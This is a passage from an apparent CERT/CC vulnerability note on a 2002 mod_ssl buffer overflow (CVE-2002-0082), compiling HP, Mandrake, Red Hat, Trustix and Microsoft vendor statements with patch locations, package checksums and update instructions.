Resource Center and would \nlike to be REMOVED from this mailing list, access the \nIT Resource Center on the World Wide Web at: \n \n<http://www.itresourcecenter.hp.com/> \n \nLogin using your IT Resource Center User ID and Password. \nThen select Support Information Digests (located under \nMaintenance and Support). You may then unsubscribe from the \nappropriate digest. \n=============================================================================== \n \n \nDigest Name: daily HP Secure OS Software for Linux security bulletins digest \nCreated: Fri Mar 15 3:00:03 PST 2002 \n \nTable of Contents: \n \nDocument ID Title \n\\--------------- ----------- \nHPSBTL0203-031 Security vulnerability in Apache prior to 1.3.23 \n \nThe documents are listed below. \n\\------------------------------------------------------------------------------- \n \n \nDocument ID: HPSBTL0203-031 \nDate Loaded: 20020314 \nTitle: Security vulnerability in Apache prior to 1.3.23 \n \nTEXT \n \n \n \n \n \n\\--------------------------------------------------------------- \nHEWLETT-PACKARD COMPANY SECURITY BULLETIN: #031 \nOriginally issued: 14 March '02 \n\\--------------------------------------------------------------- \n \nThe information in the following Security Bulletin should be acted \nupon as soon as possible. Hewlett-Packard Company will not be \nliable for any consequences to any customer resulting from said customer's \nfailure to fully implement instructions in this Security Bulletin as \nsoon as possible. \n \n\\--------------------------------------------------------------- \nPROBLEM: Security vulnerability in Apache prior to 1.3.23 and mod_ssl \nprior to 2.8.7. This bulletin addresses the same issues as the \nRed Hat Advisory RHSA-2002-041. Please, be aware, that the \nmod_ssl package has been altered for HP Secure OS software \nfor Linux. Please follow instructions provided below. \n \nPLATFORM: Any system running HP Secure OS software for Linux Release 1.0 \n \nDAMAGE: Use of the client certificates could yield unexpected results \nin Apache prior to 1.3.23 and mod_ssl prior to 2.8.7 \n \nSOLUTION: Apply the appropriate patch (see section B below). \n \nMANUAL ACTIONS: None \n \nAVAILABILITY: The patch is available now. \n\\--------------------------------------------------------------- \nA. Background \nHP Secure OS software for Linux Release 1.0 was released \nwith the 1.3.19 version of Apache. Since then, Apache 1.3.23 \nhas been released to correct a number of security related problems. \n \nB. Fixing the problem \nApply patch HPTL_00012. \n \nThe patch is available as follows: - \n \nUse your browser to access the HP IT Resource Center page \nat: \n \n<http://itrc.hp.com> \n \nUse the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login. Remember to save the \nUser ID assigned to you, and your password. This login provides \naccess to many useful areas of the ITRC. \n \nUnder the \"Maintenance and Support\" section, select \"Individual Patches\". \n \nIn the field at the bottom of the page labeled \"retrieve a specific patch \nby entering the patch name\", enter HPTL_00012. \n \nFor instructions on installing the patch, please see the install text file \nincluded in the patch. \n \nC. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n \nUse your browser to access the HP IT Resource Center page at: \n \n<http://itrc.hp.com> \n \nUse the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login. Remember to \nsave the User ID assigned to you, and your password. This \nlogin provides access to many useful areas of the ITRC. \n \nIn the left most frame select \"Maintenance and Support\". \n \nUnder the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n \nTo -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n \nor \n \nTo -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n \nD. To report new security vulnerabilities, send email to \n \nsecurity-alert@hp.com \n \nPlease encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver. You may also get the security-alert PGP key by \nsending a message with a -subject- (not body) of \n'get key' (no quotes) to security-alert@hp.com. \n \nPermission is granted for copying and circulating this \nBulletin to Hewlett-Packard (HP) customers (or the Internet \ncommunity) for the purpose of alerting them to problems, \nif and only if, the Bulletin is not edited or changed in \nany way, is attributed to HP, and provided such reproduction \nand/or distribution is performed for non-commercial purposes. \n \nAny other use of this information is prohibited. HP is not \nliable for any misuse of this information by any third party. \n\\--------------------------------------------------------------- \n\\-----End of Document ID: HPSBTL0203-031--------------------------------------\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ MandrakeSoft\n\nNotified: March 01, 2002 Updated: March 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1\n\n________________________________________________________________________ \n \nMandrake Linux Security Update Advisory \n________________________________________________________________________ \n \nPackage name: mod_ssl \nAdvisory ID: MDKSA-2002:020 \nDate: March 7th, 2002 \nAffected versions: 7.1, 7.2, 8.0, 8.1, Corporate Server 1.0.1, \nSingle Network Firewall 7.2 \n________________________________________________________________________ \n \nProblem Description: \n \nEd Moyle discovered a buffer overflow in mod_ssl's session caching \nmechanisms that use shared memory and dbm. This could potentially be \ntriggered by sending a very long client certificate to the server. \n________________________________________________________________________ \n \nReferences: \n \n<http://online.securityfocus.com/bid/4189> \n________________________________________________________________________ \n \nUpdated Packages: \n \nLinux-Mandrake 7.1: \n57b34a081cca5b85aae6c097d067316a 7.1/RPMS/mod_ssl-2.8.5-2.4mdk.i586.rpm \n5189233df0f03cb8fe78675dc4b7b58b 7.1/SRPMS/mod_ssl-2.8.5-2.4mdk.src.rpm \n \nLinux-Mandrake 7.2: \nb1fd2e18a7d3b8d512e2bf858c040282 7.2/RPMS/mod_ssl-2.8.5-2.3mdk.i586.rpm \n09c08fd15d6e826188f51a41a047b568 7.2/SRPMS/mod_ssl-2.8.5-2.3mdk.src.rpm \n \nMandrake Linux 8.0: \n25812a052c7e82db4015c80395d0a142 8.0/RPMS/mod_ssl-2.8.5-2.2mdk.i586.rpm \nae2ab6e8cd666f6171b682f69340e0df 8.0/SRPMS/mod_ssl-2.8.5-2.2mdk.src.rpm \n \nMandrake Linux 8.0/ppc: \n53b213329a866d92c4a70273cf0b591d ppc/8.0/RPMS/mod_ssl-2.8.5-2.2mdk.ppc.rpm \nae2ab6e8cd666f6171b682f69340e0df ppc/8.0/SRPMS/mod_ssl-2.8.5-2.2mdk.src.rpm \n \nMandrake Linux 8.1: \n020058f4fd26dc78480804caf5cd0044 8.1/RPMS/mod_ssl-2.8.5-2.1mdk.i586.rpm \n8e9e7f26e64e15d4323e69cc9afad15e 8.1/SRPMS/mod_ssl-2.8.5-2.1mdk.src.rpm \n \nMandrake Linux 8.1/ia64: \n59974b39c67f4e2773416349c8207d54 ia64/8.1/RPMS/mod_ssl-2.8.5-2.1mdk.ia64.rpm \n8e9e7f26e64e15d4323e69cc9afad15e ia64/8.1/SRPMS/mod_ssl-2.8.5-2.1mdk.src.rpm \n \nCorporate Server 1.0.1: \n57b34a081cca5b85aae6c097d067316a 1.0.1/RPMS/mod_ssl-2.8.5-2.4mdk.i586.rpm \n5189233df0f03cb8fe78675dc4b7b58b 1.0.1/SRPMS/mod_ssl-2.8.5-2.4mdk.src.rpm \n \nSingle Network Firewall 7.2: \n27f5f01c9f3ec9fda3af4661fa84c9f5 snf7.2/RPMS/mod_ssl-2.8.4-4.2mdk.i586.rpm \n5421309dd07559693f07800528561612 snf7.2/SRPMS/mod_ssl-2.8.4-4.2mdk.src.rpm \n________________________________________________________________________ \n \nBug IDs fixed (see <https://qa.mandrakesoft.com> for more information): \n \n________________________________________________________________________ \n \nTo upgrade automatically, use MandrakeUpdate. The verification of md5 \nchecksums and GPG signatures is performed automatically for you. \n \nIf you want to upgrade manually, download the updated package from one \nof our FTP server mirrors and upgrade with \"rpm -Fvh *.rpm\". A list of \nFTP mirrors can be obtained from: \n \n<http://www.mandrakesecure.net/en/ftp.php> \n \nPlease verify the update prior to upgrading to ensure the integrity of \nthe downloaded package. You can do this with the command: \n \nrpm --checksig &lt;filename&gt; \n \nAll packages are signed by MandrakeSoft for security. You can obtain \nthe GPG public key of the Mandrake Linux Security Team from: \n \n<https://www.mandrakesecure.net/RPM-GPG-KEYS> \n \nPlease be aware that sometimes it takes the mirrors a few hours to \nupdate. \n \nYou can view other update advisories for Mandrake Linux at: \n \n<http://www.mandrakesecure.net/en/advisories/> \n \nMandrakeSoft has several security-related mailing list services that \nanyone can subscribe to. Information on these lists can be obtained by \nvisiting: \n \n<http://www.mandrakesecure.net/en/mlist.php> \n \nIf you want to report vulnerabilities, please contact \n \nsecurity@linux-mandrake.com \n________________________________________________________________________ \n \nType Bits/KeyID Date User ID \npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n&lt;security@linux-mandrake.com&gt; \n \n \n\\- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.5 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \nmQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday \nL4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 \nWKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo \nP0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl \nhynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx \nPFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg \n2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs \niyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD \nLLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu \nZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t \nPohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy \n/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA \nBgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP \nWdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w \nPk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPa5AQ0EOWnn \n7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ9F77 \n9FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzRxBXV \nJb57fFQjxOu4eNjZAtfII/YXb0uyXXrdr5dlJ/3eXrcO4p0XAAMFBACCxo6Z269s \n+A4v8C6Ui12aarOQcCDlV8cVG9LkyatU3FNTlnasqwo6EkaP572448weJWwN6SCX \nVl+xOYLiK0hL/6Jb/O9Agw75yUVdk+RMM2I4fNEi+y4hmfMh2siBv8yEkEvZjTcl \n3TpkTfzYky85tu433wmKaLFOv0WjBFSikohGBBgRAgAGBQI5aefvAAoJEJqo0NAi \nRYqYid0AoJgeWzXrEdIClBOSW5Q6FzqJJyaqAKC0Y9YI3UFlE4zSIGjcFlLJEJGX \nlA== \n=0ahQ \n\\- -----END PGP PUBLIC KEY BLOCK----- \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \niD8DBQE8iD4ymqjQ0CJFipgRApoOAKDHTMIWmVyawBQQ7EpuhcTsf3DFswCg8Avh \nivsKSso3VTP3qYIhaPKTAfA= \n=JG5R \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ Mod_ssl\n\nNotified: February 28, 2002 Updated: March 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nVersions of mod_ssl prior to 2.8.7 for Apache 1.3.23 are vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Red Hat\n\nNotified: March 01, 2002 Updated: March 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nRed Hat Linux 7.0, 7.1, 7.2 as well as Red Hat Secure Web Server 3.2 contain a vulnerable version of mod_ssl. However to exploit the overflow, the server must be configured to require client certificates, and an attacker must obtain a carefully crafted client certificate that has been signed by a Certificate Authority which is trusted by the server. Users who use client certificate authentication would be wise to upgrade or switch to the superior shared memory session cache, shmcb, which is not vulnerable to this issue. Updated mod_ssl packages will be available shortly at the following URL. Users of the Red Hat Network can use the 'up2date' tool to update their systems at the same time.\n\n<http://www.redhat.com/support/errata/RHSA-2002-041.html> \n \nVersion 3.0 and earlier of Red Hat Stronghold contain a vulnerable version of mod_ssl. Red Hat Stronghold is set by default to use the shmcb session cache (also known as c2shm) which is not vulnerable to this issue. Updates to Stronghold will be available shortly. \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Trustix\n\nUpdated: March 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n\n\n\\- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2002-0034 \n \nPackage name: apache \nSummary: Security fix and version upgrade \nDate: 2002-02-28 \nAffected versions: TSL 1.5 \n \n\\- -------------------------------------------------------------------------- \n \nProblem description: \nThe mod_ssl module in Apache utilizes OpenSSL for the SSL implementation. \nThe version in the old apache package made use of the underlying OpenSSL \nroutines in a manner which could overflow a buffer within the implementation. \nThis release (mod_ssl-2.8.7-1.3.23) fixes the problem. \n \nAction: \nWe recommend that all systems with this package installed are upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n \n \nLocation: \nAll TSL updates are available from \n&lt;URI:<http://www.trustix.net/pub/Trustix/updates/>&gt; \n&lt;URI:<ftp://ftp.trustix.net/pub/Trustix/updates/>&gt; \n \n \nAutomatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n \nGet SWUP from: \n&lt;URI:<ftp://ftp.trustix.net/pub/Trustix/software/swup/>&gt; \n \n \nPublic testing: \nThese packages have been available for public testing for some time. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n&lt;URI:<http://www.trustix.net/pub/Trustix/testing/>&gt; \n&lt;URI:<ftp://ftp.trustix.net/pub/Trustix/testing/>&gt; \n \n \nQuestions? \nCheck out our mailing lists: \n&lt;URI:<http://www.trustix.net/support/>&gt; \n \n \nVerification: \nThis advisory along with all TSL packages are signed with the TSL sign key. \nThis key is available from: \n&lt;URI:<http://www.trustix.net/TSL-GPG-KEY>&gt; \n \nThe advisory itself is available from the errata pages at \n&lt;URI:<http://www.trustix.net/errata/trustix-1.5/>&gt; \nor directly at \n&lt;URI:<http://www.trustix.net/errata/misc/2002/TSL-2002-0034-apache.asc.txt>&gt; \n \n \nMD5sums of the packages: \n\\- -------------------------------------------------------------------------- \nc75115bb82f788f2d673e13faf66254b ./1.5/SRPMS/apache-1.3.23-1tr.src.rpm \n7ea8c94b43b43cdbc2a9b31be96e40b5 ./1.5/RPMS/apache-devel-1.3.23-1tr.i586.rpm \neea37ac2ee6c2611d9434977fa389475 ./1.5/RPMS/apache-1.3.23-1tr.i586.rpm \n\\- -------------------------------------------------------------------------- \n \n \nTrustix Security Team \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \niD8DBQE8fj8XwRTcg4BxxS0RAmMvAJ9NUotASETlF+AZ7NA9bCxX9RScHQCfQa3g \nUKIuLd2Zg8uRINq1N67j48k= \n=3Cg+ \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Microsoft\n\nNotified: March 01, 2002 Updated: March 04, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nWe've checked in our implementation of ASN.1 in SSL and we are not affected by this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\nView all 12 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://archives.neohapsis.com/archives/bugtraq/2002-02/0313.html>\n * <http://www.apache-ssl.org/advisory-20020301.txt>\n * <http://www.trustix.net/errata/misc/2002/TSL-2002-0034-apache.asc.txt>\n * <http://www.linuxsecurity.com/advisories/other_advisory-1923.html>\n * <http://www.apacheweek.com/issues/02-03-01.html#security>\n\n### Acknowledgements\n\nEd Moyle discovered and analyzed this vulnerability. \n\nThis document was written by Jason Rafail with assistance from Roman Danyliw, Sean Levy, and Jeff Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0082](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0082>) \n---|--- \n**Severity Metric:****** | 15.50 \n**Date Public:** | 2002-02-27 \n**Date First Published:** | 2002-03-01 \n**Date Last Updated: ** | 2002-04-22 20:44 UTC \n**Document Revision: ** | 26 \n", "modified": "2002-04-22T20:44:00", "published": "2002-03-01T00:00:00", "id": "VU:234971", "href": "https://www.kb.cert.org/vuls/id/234971", "type": "cert", "title": "mod_ssl and Apache_SSL modules contain a buffer overflow in the implementation of the OpenSSL \"i2d_SSL_SESSION\" routine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}